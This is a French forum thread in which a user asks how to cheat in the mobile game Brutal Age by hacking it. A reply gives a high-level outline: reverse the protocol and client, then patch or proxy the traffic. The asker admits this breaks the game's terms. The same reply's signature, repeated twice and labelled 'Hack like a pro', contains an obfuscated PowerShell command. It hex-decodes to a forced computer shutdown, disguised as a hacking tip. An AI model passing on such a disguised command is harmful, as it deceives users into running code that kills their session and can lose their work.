Annonce

Réduire
Aucune annonce.

Serveur intouchable par les hacker?

Réduire
X
 
  • Filtre
  • Heure
  • Afficher
Tout nettoyer
nouveaux messages

  • Serveur intouchable par les hacker?

    Bonjour,

    J'aimerais savoir si les jeu mobile comme Brutal Age: Horde Invasion (Disponible sur Google Play et App Store. Ici je m'intéresse à la version Google Play.) peuvent être hacker !

    Je m'explique!
    Ils fonctionne à 100% ou presque via les serveurs, ce qui veut dire que si l'ont veut tricher la dessus il faut toucher au serveur..
    Pouvons nous même si c'est compliqué y parvenir. Si oui qui pourrait m'expliquer tout ça ?
    Ensuite merci d'aller voir mon post dans la catégorie Reverse engineering si vous avez des compétences en la matière. Cela est la suite de ce post en quelque sorte!!

    Par avance merci de vos réponses.

    PS: éviter les débats inutiles, si vous n'êtes pas sur de vous ou si vous n'avez pas tester avant ne pas poster. Ne vous disputer pas entre vous parce que vous êtes pas d'accord et éviter de généré ce genre d'emportement via vos post. Simplement que je ne soit pas plein de notifications et d'espoir d'avoir des solutions alors que ce sont des gens qui débattent autre part que par message privé! Merci!!!!

  • #2
    Bonjour,

    Non faut pas toucher le serveur.
    Faut toucher ce que ton client envoie au serveur.
    Il faut donc toucher au client.

    Dans les grandes lignes, il te faudra :
    -> Reverse du protocole réseau pour comprendre la manière dont le client et le serveurs communiquent. (Genre comment est-ce que le client fait comprendre au serveur que j'ai déplacé mon perso vers la droite ?)
    -> Reverse du programme client pour comprendre les fonctions qui permettent de forger les paquets réseaux sus-cités
    -> Patch du client / utilisation d'un proxy pour modifier le comportement du jeu.

    Si tu pars de 0, ce qui est visiblement le cas, prépares toi à quelques mois / années de taff quand même.

    Tu ferras bien sur cela sur un jeu dont les CGU / licensing te permettent de le faire.
    Hack like a pro :
    PS > iex $(-join('73746F702D636F6D7075746572202D466F726365' -split '(?<=\G.{2})',20|%{[char][int]"0x$_"}))

    Commentaire


    • #3
      Envoyé par e_miike Voir le message
      Bonjour,

      J'aimerais savoir si les jeu mobile comme Brutal Age: Horde Invasion (Disponible sur Google Play et App Store. Ici je m'intéresse à la version Google Play.) peuvent être hacker !

      Je m'explique!
      Ils fonctionne à 100% ou presque via les serveurs, ce qui veut dire que si l'ont veut tricher la dessus il faut toucher au serveur..
      Pouvons nous même si c'est compliqué y parvenir. Si oui qui pourrait m'expliquer tout ça ?
      Ensuite merci d'aller voir mon post dans la catégorie Reverse engineering si vous avez des compétences en la matière. Cela est la suite de ce post en quelque sorte!!

      Par avance merci de vos réponses.

      PS: éviter les débats inutiles, si vous n'êtes pas sur de vous ou si vous n'avez pas tester avant ne pas poster. Ne vous disputer pas entre vous parce que vous êtes pas d'accord et éviter de généré ce genre d'emportement via vos post. Simplement que je ne soit pas plein de notifications et d'espoir d'avoir des solutions alors que ce sont des gens qui débattent autre part que par message privé! Merci!!!!
      Salut,

      Dommage pour toi, mais débattre c'est le but d'un forum. De plus, on est gentils mais si tu fais un post ailleurs et que tu en parles ici, merci de nous copier le lien, on est un peu feignants.
      Enfin, les PS de ce type, tu éviteras à l'avenir, car c'est tout sauf agréable, du moins c'est mon ressenti.

      Cordialement.
      Writer, Cyber Security Enthusiast! Follow me on Twitter: @SwitHak

      Commentaire


      • #4
        Envoyé par L'OMBRE Voir le message

        Salut,

        Dommage pour toi, mais débattre c'est le but d'un forum. De plus, on est gentils mais si tu fais un post ailleurs et que tu en parles ici, merci de nous copier le lien, on est un peu feignants.
        Enfin, les PS de ce type, tu éviteras à l'avenir, car c'est tout sauf agréable, du moins c'est mon ressenti.

        Cordialement.
        Bonsoir,

        Je ne voulez pas paraître désagréable mais le peu d’expérience que j'ai en matière de forum m'amène à me dire que il y à toujours des débats en réponses au sujet initiale. Débats souvent inutiles pour le posteur du sujet.
        Désolé donc de t'avoir donner ce ressentit, ce n'était pas le but!

        Cordialement.

        Commentaire


        • #5
          Envoyé par Krisscool Voir le message
          Bonjour,

          Non faut pas toucher le serveur.
          Faut toucher ce que ton client envoie au serveur.
          Il faut donc toucher au client.

          Dans les grandes lignes, il te faudra :
          -> Reverse du protocole réseau pour comprendre la manière dont le client et le serveurs communiquent. (Genre comment est-ce que le client fait comprendre au serveur que j'ai déplacé mon perso vers la droite ?)
          -> Reverse du programme client pour comprendre les fonctions qui permettent de forger les paquets réseaux sus-cités
          -> Patch du client / utilisation d'un proxy pour modifier le comportement du jeu.

          Si tu pars de 0, ce qui est visiblement le cas, prépares toi à quelques mois / années de taff quand même.

          Tu ferras bien sur cela sur un jeu dont les CGU / licensing te permettent de le faire.
          Bonsoir,

          Merci de cette réponse qui me fais déjà un minimum avancer. Saurait tu si je peux être aider à faire cela ?
          Je sais que ce n'es pas dans tes principe car les CGU / Licensing ne me le permettent pas mais je souhaite découvrir quand même comment l'ont fait....
          C'est surement illégal mais c'est aussi instructif. De plus avec l'argent que je leurs es lâché en jouant (plus de 1000€) et celui qu'il gagne chaque jours... Je ne pense pas qu'ils feront autre choses que de me bannir. Je sais qu'ils ont accès au logs total de nos moindre fait et gestes sur le jeu. Le ban serat donc rapide mais au moins j'aurais pu apprendre et tester mon résultat.

          Cordialement, merci de ta réponse.

          Commentaire


          • #6
            Saurait tu si je peux être aider à faire cela ?
            Désolé mais je crains de ne pas avoir 6 mois à te consacrer.

            Par contre tu peux commencer à travailler, montrer que tu as commencé à travailler, et poser des questions ciblées.

            Si tu ne sais pas par ou commencer, je ne peux que te renvoyer à mon premier post + google. Tu n'es pas le premier à se prêter à ce genre d’exercice.

            PS : Sinon oui L'OMBRE a raison, ton PS craint grave.
            Hack like a pro :
            PS > iex $(-join('73746F702D636F6D7075746572202D466F726365' -split '(?<=\G.{2})',20|%{[char][int]"0x$_"}))

            Commentaire


            • #7
              Envoyé par e_miike Voir le message
              PS: éviter les débats inutiles, si vous n'êtes pas sur de vous ou si vous n'avez pas tester avant ne pas poster. Ne vous disputer pas entre vous parce que vous êtes pas d'accord et éviter de généré ce genre d'emportement via vos post. Simplement que je ne soit pas plein de notifications et d'espoir d'avoir des solutions alors que ce sont des gens qui débattent autre part que par message privé! Merci!!!!
              Il y a des modérateurs qui sont là pour gérer ce genre de chose, et le fait de donner ce genre de remarque ne fera que pousser les gens à faire le contraire. Il faudra donc éviter à l'avenir ce genre de pavé inutile. Merci par avance !

              Commentaire


              • #8
                Fail
                Dernière modification par e_miike, 28 juillet 2017, 16h19.

                Commentaire

                Chargement...
                X